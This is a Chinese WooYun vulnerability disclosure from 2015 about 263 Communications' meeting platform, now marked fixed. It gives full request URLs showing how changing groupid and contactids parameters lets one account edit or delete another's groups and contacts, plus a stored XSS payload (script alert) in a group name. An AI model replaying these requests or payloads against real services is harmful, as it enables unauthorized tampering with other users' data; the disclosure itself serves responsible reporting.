当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122437

漏洞标题:263通信某平台越权+XSS

相关厂商:263通信

漏洞作者: 懒人

提交时间:2015-06-24 12:00

修复时间:2015-08-04 09:45

公开时间:2015-08-04 09:45

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-24: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

权限绕过

详细说明:

二六三会议圈
首先注册两个账号用来测试
http://cc.263.net/toRegist
账号一:张三
账号二:李四
1、张三登录系统,在个人通讯录中添加组管理,发现用户组信息可越权:

21.png


2、修改用户组

22.png


http://cc.263.net/ajaxAddContactGroups?groupid=69&groupname=%E5%BC%A0%E4%B8%89%E7%9A%84%E7%94%A8%E6%88%B7%E7%BB%841
参数groupid可以任意修改并修改成功
3、删除用户组
http://cc.263.net/ajaxDeleteContactGroups?groupid=71
参数groupid可以任意修改并删除成功
4、用户联系人也可越权修改、删除

23.png


http://cc.263.net/ajaxModifyPerson?addrname=%E7%8E%8B%E4%BA%94&contactids=38208&description=&email=&groupId=72&phonenum=13530018941&phonenum1=
参数contactids可任意修改,并修改成功
http://cc.263.net/deletePerson?contactids=38208
参数contactids可任意修改,并删除成功
5、XSS测试,客户端js有验证,但是服务端没有验证,很容易绕过

24.png


抓包获取修改组名提交地址
http://cc.263.net/ajaxAddContactGroups?groupid=73&groupname=%E7%BB%84%3Cscript%3Ealert%28/xss/%29%3C/script%3E
修改参数groupname的值为组<script>alert(/xss/)</script>
然后groupid任意修改,可保存成功,这里修改为李四的groupid,登录李四的账号,加载XSS成功

25.png


漏洞证明:

修复方案:

验证数据权限,过滤XSS

版权声明:转载请注明来源 懒人@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-29 09:17

厂商回复:

正在修复中

最新状态:

2015-08-04:已修复